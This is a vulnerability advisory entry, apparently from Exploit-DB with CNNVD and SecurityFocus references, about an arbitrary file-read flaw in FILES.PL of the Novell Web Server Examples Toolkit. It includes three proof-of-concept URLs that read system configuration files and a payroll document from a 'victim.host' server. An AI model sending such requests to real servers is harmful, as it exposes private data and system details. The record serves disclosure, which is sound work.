https://www.exploit-db.com/exploits/20482
https://www.securityfocus.com/bid/88445
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200201-009

NovellWebServerExamplesToolkit2中的files.pl脚本存在漏洞。远程攻击者读取任意文件。

source: http://www.securityfocus.com/bid/2076/info

Novell Web Server 3.x Examples Toolkit v.2 is a package containing example scripts and HTML files to help administrators design web sites. It is not a support Novell product and is provided solely as a convenience to the user. The toolkit contained a script called "FILES.PL" that could be used to view the contents of files or directories on the server by a remote attacker. This is done by passing the parameter "file=<file-or-directory-to-view>" to the script. An attacker could gain information useful in conducting subsequent attacks, or retrieve personal or proprietary information. 

http://victim.host/perl/files.pl?file=sys:system/autoexec.ncf
http://victim.host/perl/files.pl?file=sys:etc/ldremote.ncf
http://victim.host/perl/files.pl?file=vol2:apps/accounting/payroll.doc

Novell Web Server 2.0 Examples Toolkit

来源:XF
名称:http-nov-files(2054)
链接:http://xforce.iss.net/static/2054.php
来源:www.w3.org
链接:http://www.w3.org/Security/Faq/wwwsf8.html#Q87
来源:www.roxanne.org
链接:http://www.roxanne.org/faqs/www-secure/wwwsf4.html#Q35